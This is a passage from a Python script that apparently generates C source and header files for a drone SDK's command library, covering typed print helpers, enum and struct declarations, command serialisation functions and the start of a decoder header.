cfile.write ('#else\n') cfile.write (' len = snprintf (& output [offset], capacity, "%u", arg);\n') cfile.write ('#endif\n') cfile.write (' if (len >= capacity)\n') cfile.write (' {\n') cfile.write (' retVal = -1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = offset + len;\n') cfile.write (' }\n') cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.I16]: cfile.write ('// Write a string in a buffer from an int16_t arg\n') cfile.write ('// On error, return -1, else return offset in string\n') cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI16') + ' (const char *name, int16_t arg, char *output, int outputLen, int outputOffset)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' int capacity, len;\n') cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n') cfile.write (' int retVal = offset;\n') cfile.write (' if (offset >= 0)\n') cfile.write (' {\n') cfile.write (' capacity = outputLen - offset - 1;\n') cfile.write ('#if HAVE_DECL_PRII16\n') cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIi16, arg);\n') cfile.write ('#else\n') cfile.write (' len = snprintf (& output [offset], capacity, "%d", arg);\n') cfile.write ('#endif\n') cfile.write (' if (len >= capacity)\n') cfile.write (' {\n') cfile.write (' retVal = -1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = offset + len;\n') cfile.write (' }\n') cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.U32]: cfile.write ('// Write a string in a buffer from an uint32_t arg\n') cfile.write ('// On error, return -1, else return offset in string\n') cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU32') + ' (const char *name, uint32_t arg, char *output, int outputLen, int outputOffset)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' int capacity, len;\n') cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n') cfile.write (' int retVal = offset;\n') cfile.write (' if (offset >= 0)\n') cfile.write (' {\n') cfile.write (' capacity = outputLen - offset - 1;\n') cfile.write ('#if HAVE_DECL_PRIU32\n') cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIu32, arg);\n') cfile.write ('#else\n') cfile.write (' len = snprintf (& output [offset], capacity, "%u", arg);\n') cfile.write ('#endif\n') cfile.write (' if (len >= capacity)\n') cfile.write (' {\n') cfile.write (' retVal = -1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = offset + len;\n') cfile.write (' }\n') cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.I32] or hasArgOfType[ArArgType.ENUM]: cfile.write ('// Write a string in a buffer from an int32_t arg\n') cfile.write ('// On error, return -1, else return offset in string\n') cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI32') + ' (const char *name, int32_t arg, char *output, int outputLen, int outputOffset)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' int capacity, len;\n') cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n') cfile.write (' int retVal = offset;\n') cfile.write (' if (offset >= 0)\n') cfile.write (' {\n') cfile.write (' capacity = outputLen - offset - 1;\n') cfile.write ('#if HAVE_DECL_PRII32\n') cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIi32, arg);\n') cfile.write ('#else\n') cfile.write (' len = snprintf (& output [offset], capacity, "%d", arg);\n') cfile.write ('#endif\n') cfile.write (' if (len >= capacity)\n') cfile.write (' {\n') cfile.write (' retVal = -1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = offset + len;\n') cfile.write (' }\n') cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.U64]: cfile.write ('// Write a string in a buffer from an uint64_t arg\n') cfile.write ('// On error, return -1, else return offset in string\n') cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintU64') + ' (const char *name, uint64_t arg, char *output, int outputLen, int outputOffset)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' int capacity, len;\n') cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n') cfile.write (' int retVal = offset;\n') cfile.write (' if (offset >= 0)\n') cfile.write (' {\n') cfile.write (' capacity = outputLen - offset - 1;\n') cfile.write ('#if HAVE_DECL_PRIU64\n') cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIu64, arg);\n') cfile.write ('#else\n') cfile.write (' len = snprintf (& output [offset], capacity, "%llu", arg);\n') cfile.write ('#endif\n') cfile.write (' if (len >= capacity)\n') cfile.write (' {\n') cfile.write (' retVal = -1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = offset + len;\n') cfile.write (' }\n') cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.I64]: cfile.write ('// Write a string in a buffer from an int64_t arg\n') cfile.write ('// On error, return -1, else return offset in string\n') cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintI64') + ' (const char *name, int64_t arg, char *output, int outputLen, int outputOffset)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' int capacity, len;\n') cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n') cfile.write (' int retVal = offset;\n') cfile.write (' if (offset >= 0)\n') cfile.write (' {\n') cfile.write (' capacity = outputLen - offset - 1;\n') cfile.write ('#if HAVE_DECL_PRII64\n') cfile.write (' len = snprintf (& output [offset], capacity, "%" PRIi64, arg);\n') cfile.write ('#else\n') cfile.write (' len = snprintf (& output [offset], capacity, "%lld", arg);\n') cfile.write ('#endif\n') cfile.write (' if (len >= capacity)\n') cfile.write (' {\n') cfile.write (' retVal = -1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = offset + len;\n') cfile.write (' }\n') cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.FLOAT]: cfile.write ('// Write a string in a buffer from float arg\n') cfile.write ('// On error, return -1, else return offset in string\n') cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintFloat') + ' (const char *name, float arg, char *output, int outputLen, int outputOffset)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' int capacity, len;\n') cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n') cfile.write (' int retVal = offset;\n') cfile.write (' if (offset >= 0)\n') cfile.write (' {\n') cfile.write (' capacity = outputLen - offset - 1;\n') cfile.write (' len = snprintf (& output [offset], capacity, "%f", arg);\n') cfile.write (' if (len >= capacity)\n') cfile.write (' {\n') cfile.write (' retVal = -1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = offset + len;\n') cfile.write (' }\n') cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.DOUBLE]: cfile.write ('// Write a string in a buffer from a double arg\n') cfile.write ('// On error, return -1, else return offset in string\n') cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintDouble') + ' (const char *name, double arg, char *output, int outputLen, int outputOffset)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' int capacity, len;\n') cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n') cfile.write (' int retVal = offset;\n') cfile.write (' if (offset >= 0)\n') cfile.write (' {\n') cfile.write (' capacity = outputLen - offset - 1;\n') cfile.write (' len = snprintf (& output [offset], capacity, "%f", arg);\n') cfile.write (' if (len >= capacity)\n') cfile.write (' {\n') cfile.write (' retVal = -1;\n') cfile.write (' }\n') cfile.write (' else\n') cfile.write (' {\n') cfile.write (' retVal = offset + len;\n') cfile.write (' }\n') cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n') cfile.write (' return retVal;\n') cfile.write ('}\n') cfile.write ('\n') if hasArgOfType[ArArgType.STRING]: cfile.write ('// Write a string in a buffer from a string arg\n') cfile.write ('// On error, return -1, else return offset in string\n') cfile.write ('int ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'PrintString') + ' (const char *name, const char *arg, char *output, int outputLen, int outputOffset)\n') cfile.write ('{\n') cfile.write (' // We don\'t check args because this function is only called by autogenerated code\n') cfile.write (' int offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (name, output, outputLen, outputOffset);\n') cfile.write (' if (offset >= 0)\n') cfile.write (' {\n') cfile.write (' offset = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'WriteString') + ' (arg, output, outputLen, offset);\n') cfile.write (' } // No else --> Do nothing if the previous WriteString failed\n') cfile.write (' return offset;\n') cfile.write ('}\n') cfile.write ('\n') cfile.close () ################################# # 4TH PART : # ################################# # Generate public Types H file # ################################# hfile = open (paths.COMMANDSTYPES_HFILE, 'w') hfile.write ('// ARSDK_NO_ENUM_PREPROCESS //') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @file ' + COMMANDSTYPES_HFILE_NAME + '\n') hfile.write (' * @brief libARCommands types header.\n') hfile.write (' * This file contains all types declarations needed to use commands\n') hfile.write (' * @note Autogenerated file\n') hfile.write (' **/\n') hfile.write ('#ifndef ' + COMMANDSTYPES_DEFINE + '\n') hfile.write ('#define ' + COMMANDSTYPES_DEFINE + '\n') hfile.write ('#include <inttypes.h>\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief Size of the ARCommands header.\n') hfile.write (' * This is the minimum size of a zero-arg command.\n') hfile.write (' * The size of a command is equal to this, plus the size\n') hfile.write (' * of its arguments.\n') hfile.write (' */\n') hfile.write ('#define ' + ARMacroName (LIB_MODULE, 'HEADER', 'SIZE') + ' (4)\n') hfile.write ('\n') if genDebug: hfile.write ('/**\n') hfile.write (' * Defined only if the library includes debug commands\n') hfile.write (' */\n') hfile.write ('#define ' + ARMacroName (LIB_MODULE, 'HAS', 'DEBUG_COMMANDS') + ' (1)\n') hfile.write ('\n') for ftr in allFeatures: hfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n') for enum in ftr.enums: submodules=get_ftr_old_name(ftr).upper() macro_name=enum.name.upper(); hfile.write ('\n/**\n') hfile.write (' * @brief ' + enum.doc.replace('\n', '\\n') + '\n') hfile.write (' */\n') hfile.write ('typedef enum\n') hfile.write ('{\n') first = True for eVal in enum.values: hfile.write (' ' + AREnumValue (LIB_MODULE, submodules, macro_name, eVal.name)) if eVal.value: hfile.write (' = ' + str(eVal.value)) elif first: hfile.write (' = 0') hfile.write (', ///< ' + eVal.doc.replace('\n', '\\n') + '\n') first = False hfile.write (' ' + AREnumValue (LIB_MODULE, submodules, macro_name, 'MAX') + '\n') hfile.write ('} ' + AREnumName (LIB_MODULE, submodules, macro_name) + ';\n\n') #If the enum is used as bit field if enum.usedLikeBitfield: #Generate bit field flags for eVal in enum.values: hfile.write ('#define ' + ARFlagValue (LIB_MODULE, submodules, macro_name, eVal.name) + ' (1 << '+AREnumValue (LIB_MODULE, submodules, macro_name, eVal.name)+ ') ///< ' + eVal.doc.replace('\n', '\\n') + '\n') hfile.write ('\n') for ftr in allFeatures: hfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n') for multiset in ftr.multisets: submodules=get_ftr_old_name(ftr) hfile.write ('\n/**\n') hfile.write (' * @brief ' + multiset.doc.replace('\n', '\\n') + '\n') hfile.write (' */\n') hfile.write ('typedef struct\n') hfile.write ('{\n') for msg in multiset.msgs: hfile.write (' struct\n') hfile.write (' {\n') hfile.write (' uint8_t isSet;\n') for arg in msg.args: hfile.write (' '+xmlToC (LIB_MODULE, msg.ftr, msg, arg) +' '+arg.name+';\n') hfile.write (' } '+msg.name+';\n') hfile.write ('\n') hfile.write ('} ' + ARTypeName (LIB_MODULE, submodules, multiset.name) + ';\n\n') hfile.write ('\n') hfile.write ('#endif /* ' + COMMANDSTYPES_DEFINE + ' */\n') hfile.close () ################################# # 5TH PART : # ################################# # Generate public coder H file # ################################# hfile = open (paths.COMMANDSGEN_HFILE, 'w') hfile.write (LICENCE_HEADER) hfile.write ('/**\n') hfile.write (' * @file ' + COMMANDSGEN_HFILE_NAME + '\n') hfile.write (' * @brief libARCommands generator header.\n') hfile.write (' * This file contains all declarations needed to generate commands\n') hfile.write (' * @note Autogenerated file\n') hfile.write (' **/\n') hfile.write ('#ifndef ' + COMMANDSGEN_DEFINE + '\n') hfile.write ('#define ' + COMMANDSGEN_DEFINE + '\n') hfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n') hfile.write ('#include <inttypes.h>\n') hfile.write ('\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief Error codes for ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'GenerateCommand') + ' functions\n') hfile.write (' */\n') hfile.write ('typedef enum {\n') hfile.write (' ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ' = 0, ///< No error occured\n') hfile.write (' ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'BAD_ARGS') + ', ///< At least one of the arguments is invalid\n') hfile.write (' ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ', ///< The given output buffer was not large enough for the command\n') hfile.write (' ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'ERROR') + ', ///< Any other error\n') hfile.write ('} ' + AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ';\n') hfile.write ('\n') hfile.write ('\n') for ftr in allFeatures: hfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n\n') for cmd in ftr.cmds + ftr.evts: hfile.write ('\n/**\n') hfile.write (' * @brief ' + cmd.doc.desc.replace('\n', '\n * ') + '\n') if cmd.isDeprecated: hfile.write (' * @deprecated\n') hfile.write (' * @warning A command is not NULL terminated and can contain NULL bytes.\n') hfile.write (' * @param buffer Pointer to the buffer in which the library should store the command\n') hfile.write (' * @param buffLen Size of the buffer\n') hfile.write (' * @param cmdLen Pointer to an integer that will hold the actual size of the command\n') for arg in cmd.args: hfile.write (' * @param _' + arg.name + ' ' + get_arg_doc(arg).replace('\n', '\\n') + '\n') #If the argument is a bitfield if isinstance(arg.argType, ArBitfield): hfile.write (' * @param _' + arg.name + ' a combination of') #Find the feature owning the enum for bitFieldFtr in allFeatures: for enum2 in bitFieldFtr.enums: if enum2 == arg.argType.enum: break; else: continue break for eVal in arg.argType.enum.values: hfile.write (' ; ' + ARFlagValue(LIB_MODULE, bitFieldFtr.name , arg.argType.enum.name, eVal.name)) hfile.write ('\n') hfile.write (' * @return Error code (see ' + AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ')\n') hfile.write (' */\n') hfile.write (AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'Generate' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd))) + ' (uint8_t *buffer, int32_t buffLen, int32_t *cmdLen') for arg in cmd.args: hfile.write (', ' + xmlToCwithConst (LIB_MODULE, ftr, cmd, arg, True) + ' _' + arg.name) hfile.write (');\n') hfile.write ('\n') hfile.write ('\n') hfile.write ('\n') hfile.write ('#endif /* ' + COMMANDSGEN_DEFINE + ' */\n') hfile.close () ################################# # 6TH PART : # ################################# # Generate coder C part # ################################# cfile = open (paths.COMMANDSGEN_CFILE, 'w') cfile.write (LICENCE_HEADER) cfile.write ('/********************************************\n') cfile.write (' * AUTOGENERATED FILE *\n') cfile.write (' * DO NOT MODIFY IT *\n') cfile.write (' * *\n') cfile.write (' * To add new commands : *\n') cfile.write (' * - Modify ../Xml/commands.xml file *\n') cfile.write (' * - Re-run generateCommandsList.py script *\n') cfile.write (' * *\n') cfile.write (' ********************************************/\n') cfile.write ('#include <config.h>\n') cfile.write ('#include "' + COMMANDSRW_HFILE_NAME + '"\n') cfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n') cfile.write ('#include <' + COMMANDSGEN_HFILE_NAME + '>\n') cfile.write ('#include <' + COMMANDSID_HFILE_NAME + '>\n') cfile.write ('\n') for ftr in allFeatures: cfile.write ('// Feature ' + get_ftr_old_name(ftr) + '\n\n') for cmd in ftr.cmds + ftr.evts: cfile.write (AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'Generate' + ARCapitalize (get_ftr_old_name(ftr)) + ARCapitalize (format_cmd_name(cmd))) + ' (uint8_t *buffer, int32_t buffLen, int32_t *cmdLen') for arg in cmd.args: cfile.write (', ' + xmlToCwithConst (LIB_MODULE, ftr, cmd, arg, True) + ' _' + arg.name) cfile.write (')\n') cfile.write ('{\n') cfile.write (' int32_t currIndexInBuffer = 0;\n') if [arg for arg in cmd.args if isinstance(arg.argType, ArMultiSetting)]: cfile.write (' int32_t currFreeSizeInBuffer = 0;\n') cfile.write (' int32_t multisetSize = 0;\n') cfile.write (' int32_t multisetSizeIndex = 0;\n') cfile.write (' int32_t cmdSize = 0;\n') cfile.write (' int32_t cmdSizeIndex = 0;\n') cfile.write (' int32_t cmdIndex = 0;\n') cfile.write (' ' + AREnumName (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME) + ' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ';\n') cfile.write (' if ((buffer == NULL) ||\n') for arg in cmd.args: if isinstance(arg.argType, ArMultiSetting): cfile.write (' (_' + arg.name + ' == NULL) ||\n') cfile.write (' (cmdLen == NULL))\n') cfile.write (' {\n') cfile.write (' return ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'BAD_ARGS') + ';\n') cfile.write (' } // No else --> Args Check\n') hasStringArgs = False for arg in cmd.args: if arg.argType == ArArgType.STRING: hasStringArgs = True break if hasStringArgs: cfile.write (' // Test all String args (if any)\n') cfile.write (' if (') first = True for arg in cmd.args: if ArArgType.STRING == arg.argType: if first: first = False else: cfile.write (' ') cfile.write ('(_' + arg.name + ' == NULL) ||\n') cfile.write (' (0))\n') cfile.write (' {\n') cfile.write (' return ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'BAD_ARGS') + ';\n') cfile.write (' } // No else --> Args Check\n') cfile.write ('\n') cfile.write (' // Write feature header\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' currIndexInBuffer = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU8ToBuffer') + ' (buffer, ' + AREnumValue (LIB_MODULE, ID_SUBMODULE, 'FEATURE', get_ftr_old_name(ftr)) + ', currIndexInBuffer, buffLen);\n') cfile.write (' if (currIndexInBuffer == -1)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n') cfile.write (' } // No else --> Do not modify retVal if no issue was found\n') cfile.write (' } // No else --> Processing block\n') cfile.write (' // Write class header\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') classIdName = ARMacroName (LIB_MODULE, ID_SUBMODULE, 'FEATURE_CLASS') if cmd.cls is None else AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CLASS', cmd.cls.name) cfile.write (' currIndexInBuffer = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU8ToBuffer') + ' (buffer, ' + classIdName + ', currIndexInBuffer, buffLen);\n') cfile.write (' if (currIndexInBuffer == -1)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n') cfile.write (' } // No else --> Do not modify retVal if no issue was found\n') cfile.write (' } // No else --> Processing block\n') cfile.write (' // Write id header\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cmdIdName = AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_CMD', cmd.name) if cmd.cls is None else AREnumValue (LIB_MODULE, ID_SUBMODULE, get_ftr_old_name(ftr) + '_' + cmd.cls.name + '_CMD', cmd.name) cfile.write (' currIndexInBuffer = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU16ToBuffer') + ' (buffer, ' + cmdIdName + ', currIndexInBuffer, buffLen);\n') cfile.write (' if (currIndexInBuffer == -1)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n') cfile.write (' } // No else --> Do not modify retVal if no issue was found\n') cfile.write (' } // No else --> Processing block\n') for arg in cmd.args: if isinstance(arg.argType, ArMultiSetting): cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' multisetSizeIndex = currIndexInBuffer;\n') cfile.write (' currIndexInBuffer += sizeof(uint16_t);\n') cfile.write (' }\n') cfile.write ('\n') for multiset_msg in arg.argType.msgs: cfile.write (' if ((retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ') && (_'+arg.name+'->'+multiset_msg.name+'.isSet))\n') cfile.write (' {\n') cfile.write (' cmdSizeIndex = currIndexInBuffer;\n') cfile.write (' cmdIndex = cmdSizeIndex + sizeof(uint16_t);\n') cfile.write (' currFreeSizeInBuffer = buffLen - cmdIndex;\n') cfile.write (' // Write the command\n') cfile.write (' retVal = ' + ARFunctionName (LIB_MODULE, GEN_SUBMODULE, 'Generate' + ARCapitalize (get_ftr_old_name(multiset_msg.ftr)) + ARCapitalize (format_cmd_name(multiset_msg))) + ' (buffer + cmdIndex, currFreeSizeInBuffer, &cmdSize') for multiset_msg_arg in multiset_msg.args: cfile.write (', _' + arg.name+'->'+multiset_msg.name+'.'+multiset_msg_arg.name) cfile.write (');\n') cfile.write (' if (retVal == '+ AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') +')\n') cfile.write (' {\n') cfile.write (' // Write command size before the command\n') cfile.write (' currIndexInBuffer = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU16ToBuffer') + ' (buffer, cmdSize, cmdSizeIndex, cmdSizeIndex + sizeof(uint16_t));\n') cfile.write (' if (currIndexInBuffer == -1)\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n') cfile.write (' // Update current Index\n') cfile.write (' currIndexInBuffer += cmdSize;\n') cfile.write (' // Update Multiset Size\n') cfile.write (' multisetSize += sizeof(uint16_t) + cmdSize;\n') cfile.write (' }\n') cfile.write (' } // No else --> Processing block\n') cfile.write ('\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' // Write multiset size before all commands\n') cfile.write (' multisetSizeIndex = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'AddU16ToBuffer') + ' (buffer, multisetSize, multisetSizeIndex, multisetSizeIndex + sizeof(uint16_t));\n') cfile.write (' if (multisetSizeIndex == -1)\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n') cfile.write (' }\n') cfile.write ('\n') else: cfile.write (' // Write arg _' + arg.name + '\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' currIndexInBuffer = ' + ARFunctionName (LIB_MODULE, RW_SUBMODULE, 'Add' + xmlToSize (ftr, cmd, arg) + 'ToBuffer') + ' (buffer, _' + arg.name + ', currIndexInBuffer, buffLen);\n') cfile.write (' if (currIndexInBuffer == -1)\n') cfile.write (' {\n') cfile.write (' retVal = ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ';\n') cfile.write (' } // No else --> Do not modify retVal if no issue was found\n') cfile.write (' } // No else --> Processing block\n') cfile.write (' if (retVal == ' + AREnumValue (LIB_MODULE, GEN_SUBMODULE, GEN_ERR_ENAME, 'OK') + ')\n') cfile.write (' {\n') cfile.write (' *cmdLen = currIndexInBuffer;\n') cfile.write (' } // No else --> Do not set cmdLen if an error occured\n') cfile.write (' return retVal;\n') cfile.write ('}\n\n') cfile.write ('\n') cfile.write ('\n') cfile.write ('// END GENERATED CODE\n') cfile.close () ################################# # 7TH PART : # ################################# # Generate public decoder H file# ################################# hfile = open (paths.COMMANDSDEC_HFILE, 'w') hfile.write (LICENCE_HEADER) hfile.write ('/**\n') hfile.write (' * @file ' + COMMANDSDEC_HFILE_NAME + '\n') hfile.write (' * @brief libARCommands decoder header.\n') hfile.write (' * This file contains all declarations needed to decode commands\n') hfile.write (' * @note Autogenerated file\n') hfile.write (' **/\n') hfile.write ('#ifndef ' + COMMANDSDEC_DEFINE + '\n') hfile.write ('#define ' + COMMANDSDEC_DEFINE + '\n') hfile.write ('#include <' + COMMANDSTYPES_HFILE_NAME + '>\n') hfile.write ('#include <inttypes.h>\n') hfile.write ('\n') hfile.write ('#ifdef __GNUC__\n') hfile.write ('#define DEPRECATED __attribute__ ((deprecated))\n') hfile.write ('#elif defined(_MSC_VER)\n') hfile.write ('#define DEPRECATED __declspec(deprecated)\n' ) hfile.write ('#else\n') hfile.write ('#define DEPRECATED\n') hfile.write ('#endif\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief Error codes for ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DecodeBuffer') + ' function\n') hfile.write (' */\n') hfile.write ('typedef enum {\n') hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'OK') + ' = 0, ///< No error occured\n') hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NO_CALLBACK') + ', ///< No error, but no callback was set (so the call had no effect)\n') hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'UNKNOWN_COMMAND') + ', ///< The command buffer contained an unknown command\n') hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_DATA') + ', ///< The command buffer did not contain enough data for the specified command\n') hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'NOT_ENOUGH_SPACE') + ', ///< The string buffer was not big enough for the command description\n') hfile.write (' ' + AREnumValue (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME, 'ERROR') + ', ///< Any other error\n') hfile.write ('} ' + AREnumName (LIB_MODULE, DEC_SUBMODULE, DEC_ERR_ENAME) + ';\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief ARCOMMANDS_Decoder object holder\n') hfile.write (' */\n') hfile.write ('typedef struct ARCOMMANDS_Decoder_t ARCOMMANDS_Decoder_t;\n') hfile.write ('\n') hfile.write ('/**\n') hfile.write (' * @brief Creates a new ARCOMMANDS_Decoder_t\n') hfile.write (' * @warning This function allocates memory.\n') hfile.write (' * @note The memory must be freed by a call to ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 'DeleteDecoder') + '.\n') hfile.write (' * @return A new ARCOMMANDS_Decoder_t instance. NULL in case of error.\n') hfile.write (' */\n') hfile.write ('ARCOMMANDS_Decoder_t* ' + ARFunctionName (LIB_MODULE, DEC_SUBMODULE, 